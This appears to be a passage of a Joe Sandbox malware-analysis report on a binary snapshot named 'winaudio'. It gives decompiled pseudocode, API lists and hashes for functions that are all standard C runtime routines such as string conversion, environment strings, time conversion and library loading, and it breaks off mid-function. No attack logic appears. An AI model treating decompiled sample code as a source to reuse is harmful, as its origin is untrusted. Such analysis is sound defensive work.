                        • Opcode ID: 21e387a83ff5fd544e1164f37267db6a2f8240c8dda7aae240168c979e67c783
                        • Instruction ID: 3bf28d646c0374859df63fd5c6295c7dc66ff25c0db91063eeafd71a2fa86b3d
                        • Opcode Fuzzy Hash: 21e387a83ff5fd544e1164f37267db6a2f8240c8dda7aae240168c979e67c783
                        • Instruction Fuzzy Hash: DF412B76600705EFD726AF38CC01B6AFBE9EF89710F10466AF145DF281D7B1A9408B90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00391103 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 81%
                        			E00391103(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_t34 =  *0x3e1008; // 0x847b54ee
				_v8 = _t34 ^ _t69;
				E00380CF3(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E002E056D(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E0037E1A0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E003839E9(_t68);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E0038B939(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00397C40();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}





















                        0x00391103
                        0x0039110b
                        0x00391112
                        0x0039111e
                        0x00391123
                        0x00391128
                        0x0039112d
                        0x00391130
                        0x00391132
                        0x00391132
                        0x00391137
                        0x00391150
                        0x00391156
                        0x0039115b
                        0x003911fa
                        0x003911fe
                        0x00391203
                        0x00391203
                        0x0039121f
                        0x0039121f
                        0x00391161
                        0x00391169
                        0x0039116d
                        0x003911b9
                        0x003911bb
                        0x003911bd
                        0x003911c2
                        0x003911d9
                        0x003911e1
                        0x003911f1
                        0x003911f1
                        0x003911e1
                        0x003911f3
                        0x003911f4
                        0x00000000
                        0x003911f9
                        0x00391174
                        0x00391176
                        0x00391178
                        0x00391180
                        0x0039119d
                        0x003911a7
                        0x003911ac
                        0x00000000
                        0x00000000
                        0x003911ae
                        0x003911b4
                        0x003911b4
                        0x00000000
                        0x003911b4
                        0x00391184
                        0x00391188
                        0x0039118d
                        0x00391191
                        0x00000000
                        0x00000000
                        0x00391193
                        0x00000000

                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00385515,?,00000000,?,00000001,?,?,00000001,00385515,?), ref: 00391150
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003911D9
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,003808A6,?), ref: 003911EB
                        • __freea.LIBCMT ref: 003911F4
                          • Part of subcall function 0038B939: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0038B96B
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                        • String ID:
                        • API String ID: 2652629310-0
                        • Opcode ID: f1c37308ba504c9f77e0bd5f2992bbfdac21b9d29cc0946028faee2a73b6993a
                        • Instruction ID: 7232e12e90507f73905d33282b27a41ad43a9892dc6723419621b09f3ea0eb98
                        • Opcode Fuzzy Hash: f1c37308ba504c9f77e0bd5f2992bbfdac21b9d29cc0946028faee2a73b6993a
                        • Instruction Fuzzy Hash: 7331E332A1020BABDF26DF64DC41EAF7BA9EB00710F050269FD05EA251D735CD51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00390477 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00390477() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00390440(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E0038B939(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E0038B8FF(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                        0x00390486
                        0x0039048c
                        0x003904e4
                        0x003904e4
                        0x0039048e
                        0x0039048f
                        0x00390494
                        0x0039049d
                        0x003904a3
                        0x003904a9
                        0x003904ae
                        0x00000000
                        0x003904b0
                        0x003904b6
                        0x003904bb
                        0x003904d9
                        0x003904d3
                        0x003904d3
                        0x003904d5
                        0x003904d5
                        0x003904dc
                        0x003904e1
                        0x003904ae
                        0x003904e8
                        0x003904eb
                        0x003904eb
                        0x003904f9

                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 00390480
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003904A3
                          • Part of subcall function 0038B939: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0038B96B
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003904C9
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003904EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                        • String ID:
                        • API String ID: 1794362364-0
                        • Opcode ID: 377433045a2f985adffad1dc32935ea4a505f4b9769264868563129e84f8f49d
                        • Instruction ID: 2e66ce10002fa83438738588be95cf985c53a681729de042dfcf3849fa2710aa
                        • Opcode Fuzzy Hash: 377433045a2f985adffad1dc32935ea4a505f4b9769264868563129e84f8f49d
                        • Instruction Fuzzy Hash: DA01F773601315BF2B275AB76C8CC7F6A6DDEC2BA0716012AFE04D7100EE718C0185B0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0039B47B Relevance: 6.1, APIs: 4, Instructions: 65timeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E0039B47B(void* __esi, struct _FILETIME _a4, intOrPtr _a8, void* _a12, signed int _a16) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				signed int _v44;
				signed int _t20;
				signed int _t26;
				signed int _t46;
				void* _t47;
				signed int _t48;

				_t47 = __esi;
				_t20 =  *0x3e1008; // 0x847b54ee
				_v8 = _t20 ^ _t48;
				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
					if(FileTimeToSystemTime( &_a4,  &_v40) == 0 || SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24) == 0) {
						_t26 = E00380E68(GetLastError());
						goto L8;
					} else {
						_v44 = _v44 | 0xffffffff;
						if((E0039B525( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44) & _t46) == 0xffffffff) {
							_t26 = E00380E9E();
							 *_t26 = 0x84;
							L8:
							_t46 = _t46 | _t26 | 0xffffffff;
						}
					}
				} else {
					_t46 = _a16;
				}
				return E002E056D(_v8 ^ _t48, _t46, _t47);
			}












                        0x0039b47b
                        0x0039b483
                        0x0039b48a
                        0x0039b491
                        0x0039b4b1
                        0x0039b50c
                        0x00000000
                        0x0039b4c7
                        0x0039b4c7
                        0x0039b4f6
                        0x0039b4f8
                        0x0039b4fd
                        0x0039b512
                        0x0039b515
                        0x0039b515
                        0x0039b4f6
                        0x0039b499
                        0x0039b49c
                        0x0039b49c
                        0x0039b524

                        APIs
                        • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,0039B36C,?,?,00000000,00000000), ref: 0039B4A9
                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,0039B36C,?,?,00000000,00000000), ref: 0039B4BD
                        • GetLastError.KERNEL32(?,?,?,0039B36C,?,?,00000000,00000000), ref: 0039B505
                        • __dosmaperr.LIBCMT ref: 0039B50C
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                        • String ID:
                        • API String ID: 593088924-0
                        • Opcode ID: c5eacdc2a47573252ca8132c2c95135a60dfb8cec9178095266fb043be0982f8
                        • Instruction ID: 0f25bb6781d06af5ad1c6a8a41d11a239bad57b4145c423981ab4fe5a856c3b6
                        • Opcode Fuzzy Hash: c5eacdc2a47573252ca8132c2c95135a60dfb8cec9178095266fb043be0982f8
                        • Instruction Fuzzy Hash: 222142B290010CABCF06DFE1E985ADFB7BCAF09320F514666E516D6180EB34DA44CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038BDDA Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 81%
                        			E0038BDDA(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x3e61f8; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E0038B987(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E0038DC17(_t13, __eflags,  *0x3e61f8, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E0038BBC8(_t13, _t15, "8c>");
							E0038B8FF(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E0038B8FF();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E0038DBC1(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}










                        0x0038bdda
                        0x0038bde5
                        0x0038bde7
                        0x0038bde9
                        0x0038bdee
                        0x0038bdf1
                        0x0038bdff
                        0x0038be0b
                        0x0038be0e
                        0x0038be11
                        0x0038be23
                        0x0038be28
                        0x0038be2a
                        0x0038be35
                        0x0038be3b
                        0x0038be43
                        0x0038be45
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038be2c
                        0x0038be2c
                        0x00000000
                        0x0038be2c
                        0x0038be13
                        0x0038be13
                        0x0038be14
                        0x0038be14
                        0x0038be47
                        0x0038be48
                        0x0038be48
                        0x0038bdf3
                        0x0038bdf9
                        0x0038bdfd
                        0x0038be50
                        0x0038be51
                        0x0038be57
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038bdfd
                        0x0038be5e

                        APIs
                        • GetLastError.KERNEL32(?,?,?,00380EA3,0038B9D9,?,0038BD84,00000001,00000364,?,00381022,003DF5B0,00000010), ref: 0038BDDF
                        • SetLastError.KERNEL32(00000000), ref: 0038BE48
                        • SetLastError.KERNEL32(00000000), ref: 0038BE51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLast
                        • String ID: 8c>
                        • API String ID: 1452528299-1518881013
                        • Opcode ID: decb78149d22dba5245becb72935d13759eaa76d65b33d548bf66b301123dc4a
                        • Instruction ID: 41f10758a083bc02ea2762d6a5d96142856bf24c62d694adc9a2de69bfce0e47
                        • Opcode Fuzzy Hash: decb78149d22dba5245becb72935d13759eaa76d65b33d548bf66b301123dc4a
                        • Instruction Fuzzy Hash: 0401F436100703ABC2137636BC86DABA62D9FD0775B2600A9F614AA3D3EF759C014360
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038D9D8 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E0038D9D8(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x3f0498 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x3cfad8 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x847b54ef
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                        0x0038d9dd
                        0x0038d9e1
                        0x0038d9e8
                        0x0038d9ec
                        0x0038d9fa
                        0x0038da10
                        0x0038da14
                        0x0038da3d
                        0x0038da3f
                        0x0038da43
                        0x0038da46
                        0x0038da46
                        0x0038da4c
                        0x0038da4e
                        0x00000000
                        0x0038da4f
                        0x0038da16
                        0x0038da1f
                        0x0038da2e
                        0x0038da21
                        0x0038da24
                        0x0038da2a
                        0x0038da2a
                        0x0038da32
                        0x00000000
                        0x0038da34
                        0x0038da37
                        0x0038da39
                        0x00000000
                        0x0038da39
                        0x0038da32
                        0x0038d9ee
                        0x0038d9f3
                        0x00000000

                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0038D97F,?,00000000,00000000,00000000,?,0038DC3E,00000006,FlsSetValue), ref: 0038DA0A
                        • GetLastError.KERNEL32(?,0038D97F,?,00000000,00000000,00000000,?,0038DC3E,00000006,FlsSetValue,003CFFBC,003CFFC4,00000000,00000364,?,0038BE28), ref: 0038DA16
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0038D97F,?,00000000,00000000,00000000,?,0038DC3E,00000006,FlsSetValue,003CFFBC,003CFFC4,00000000), ref: 0038DA24
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 3497d89da141cdfc69aed1c07bae23f5a8b27fe3bd553ea9fbcbcc5cc0c4e115
                        • Instruction ID: f06bf9368f095653fb484cb90d8415d1cd9fbee8dd2e11ae062448d2c4d87dbc
                        • Opcode Fuzzy Hash: 3497d89da141cdfc69aed1c07bae23f5a8b27fe3bd553ea9fbcbcc5cc0c4e115
                        • Instruction Fuzzy Hash: 0301F736219332EBCB2BAA79DC44E667B9DAF44BA0B310661F906D72C0D735D801C7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037D02B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 19%
                        			E0037D02B(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E0037D67A(_t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0037EE55(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E0037D87C(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E0037CE35(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0037EE23(_t25, _t30);
					return _t25;
				}
				return _t25;
			}













                        0x0037d02b
                        0x0037d02b
                        0x0037d02e
                        0x0037d033
                        0x0037d036
                        0x0037d038
                        0x0037d03b
                        0x0037d03e
                        0x0037d03f
                        0x0037d042
                        0x0037d047
                        0x0037d047
                        0x0037d04a
                        0x0037d04e
                        0x0037d051
                        0x0037d056
                        0x0037d053
                        0x0037d053
                        0x0037d053
                        0x0037d059
                        0x0037d05f
                        0x0037d062
                        0x0037d064
                        0x0037d067
                        0x0037d06a
                        0x0037d06b
                        0x0037d074
                        0x0037d079
                        0x0037d07c
                        0x0037d082
                        0x0037d085
                        0x0037d088
                        0x0037d08b
                        0x0037d08c
                        0x0037d08f
                        0x0037d09a
                        0x0037d09e
                        0x00000000
                        0x0037d09e
                        0x0037d0a5

                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0037D042
                          • Part of subcall function 0037D67A: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 0037D6A9
                          • Part of subcall function 0037D67A: ___AdjustPointer.LIBCMT ref: 0037D6C4
                        • _UnwindNestedFrames.LIBCMT ref: 0037D059
                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 0037D06B
                        • CallCatchBlock.LIBVCRUNTIME ref: 0037D08F
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                        • String ID:
                        • API String ID: 2901542994-0
                        • Opcode ID: 19d1bd0eddaedbc2841487eec0f81ec538d229c3364cecdb6c558d322227e1c5
                        • Instruction ID: c0a2c611d6548d72259c018f237b0d9e3917e3baefb0b9d66e7159b7a4874296
                        • Opcode Fuzzy Hash: 19d1bd0eddaedbc2841487eec0f81ec538d229c3364cecdb6c558d322227e1c5
                        • Instruction Fuzzy Hash: 9501D732400109BBCF225F95CC05EDA3BBAEF49754F159518FA1C6A120D77AE861DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037DFA7 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0037DFA7() {
				void* _t4;
				void* _t8;

				E0037F1BC();
				E0037F496();
				if(E0037F1D9() != 0) {
					_t4 = E0037F11C(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0037F215();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                        0x0037dfa7
                        0x0037dfac
                        0x0037dfb8
                        0x0037dfbd
                        0x0037dfc2
                        0x0037dfc4
                        0x0037dfcf
                        0x0037dfc6
                        0x0037dfc6
                        0x00000000
                        0x0037dfc6
                        0x0037dfba
                        0x0037dfba
                        0x0037dfbc
                        0x0037dfbc

                        APIs
                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0037DFA7
                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0037DFAC
                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0037DFB1
                          • Part of subcall function 0037F1D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0037F1EA
                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0037DFC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                        • String ID:
                        • API String ID: 1761009282-0
                        • Opcode ID: 85a2d568a9f22ca5c3a05d58891ecd7822c16a5ffcd78b4529c18cd7bdc32b35
                        • Instruction ID: a3edc0ebb019242020b91eba5c074c17d04c98857e31afb5fd2bf6cb45d8fd76
                        • Opcode Fuzzy Hash: 85a2d568a9f22ca5c3a05d58891ecd7822c16a5ffcd78b4529c18cd7bdc32b35
                        • Instruction Fuzzy Hash: 7DC04C18044102DC5C33367066132AD53603D53784FC5D4E1F85F6F5075A0D041A9833
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002E4540 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 271COMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E002E4540(void* __ebx, signed int __edx, void* __edi) {
				void* __esi;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				signed int _t90;
				signed int* _t91;
				signed int _t95;
				void* _t99;
				signed int _t101;
				signed int _t109;
				signed int _t111;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t119;
				void* _t126;
				signed int _t129;
				intOrPtr _t131;
				signed int _t132;
				void* _t133;
				intOrPtr _t134;
				void* _t138;
				signed int _t139;
				intOrPtr _t140;
				intOrPtr _t142;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int _t152;
				void* _t153;
				intOrPtr _t155;
				void* _t157;
				char* _t158;
				signed int _t159;
				signed int _t160;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				void* _t168;
				void* _t169;
				void* _t170;

				_t146 = __edx;
				E00397C10();
				_t78 =  *0x3e1008; // 0x847b54ee
				 *(_t166 + 0x80) = _t78 ^ _t166;
				_t129 =  *(_t166 + 0x90);
				_t152 =  *(_t166 + 0x9c);
				_t162 = 0;
				 *(_t166 + 0x1c) = _t129;
				 *(_t166 + 0xc) = 0;
				_push(__edi);
				_t149 =  *(_t166 + 0x98);
				 *(_t166 + 0x2c) = _t149;
				if(_t129 != 0) {
					__eflags = _t152;
					if(_t152 == 0) {
						L57:
						L62:
						_pop(_t153);
						return E002E056D( *(_t166 + 0x90) ^ _t166, _t146, _t153);
					}
					L5:
					if(_t149 != 0) {
						 *(_t166 + 0x1c) = 0;
						_t131 = 0;
						 *((intOrPtr*)(_t166 + 0x28)) = _t152 - 1;
						 *((intOrPtr*)(_t166 + 0x18)) = 0;
						_t82 = E002F2D60( *_t149);
						_t166 = _t166 + 4;
						__eflags = _t82;
